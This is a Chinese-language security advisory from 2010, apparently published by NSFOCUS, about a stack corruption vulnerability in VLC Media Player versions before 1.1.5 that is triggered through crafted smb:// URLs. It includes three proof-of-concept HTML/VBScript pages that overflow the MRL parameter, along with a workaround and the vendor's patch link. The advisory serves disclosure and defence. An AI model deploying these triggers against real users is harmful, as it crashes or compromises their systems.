安全研究
安全漏洞
VLC媒体播放器错误调用转换栈破坏漏洞
发布日期:2010-11-17
更新日期:2010-11-18
受影响系统:
VideoLAN VLC Media Player < 1.1.5不受影响系统:
VideoLAN VLC Media Player 1.1.5描述:
BUGTRAQ ID: 44909
VLC Media Player是一款免费的媒体播放器。
在使用"WNetAddConnection2A()" Windows API 函数时,使用了不正确地调用转换,造成栈破坏,例如,欺骗用户打开特制的"smb://" URL,访问特制的网站,攻击者可以操纵用户系统。
<*来源:shinnai (shinnai@autistici.org)
链接:http://secunia.com/advisories/42244/
http://www.videolan.org/security/sa1006.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Plug-in Version:
<html>
<embed type="application/x-vlc-plugin" MRL="smb://Something.com@www.Something.com/#{aaaaaaaaaaaaaaaaaaaaaa}"></embed>
</html>
========================================================================================================================
========================================================================================================================
Activex {9BE31822-FDAD-461B-AD51-BE1D1C159921} version:
<html>
<object classid='clsid:9BE31822-FDAD-461B-AD51-BE1D1C159921' id='test'></object>
<script language = 'vbscript'>
buff = String(500, "A")
test.MRL = "smb://Something.com@www.Something.com/#{" & buff & "}"
</script>
</html>
========================================================================================================================
========================================================================================================================
Activex {E23FE9C6-778E-49D4-B537-38FCDE4887D8} version:
<html>
<object classid='clsid:E23FE9C6-778E-49D4-B537-38FCDE4887D8' id='test'></object>
<script language = 'vbscript'>
buff = String(500, "A")
test.MRL = "smb://Something.com@www.Something.com/#{" & buff & "}"
</script>
</html>
========================================================================================================================
========================================================================================================================
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 删除C:\Program Files\VideoLAN\VLC\plugins\libaccess_smb_plugin.dll下的错误文件。
厂商补丁:
VideoLAN
--------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://git.videolan.org/?p=vlc/vlc-1.1.git;a=commit;h=b531955c2206c88250cacc511793facc32cbced6
浏览次数:2675
严重程度:0(网友投票)
绿盟科技给您安全的保障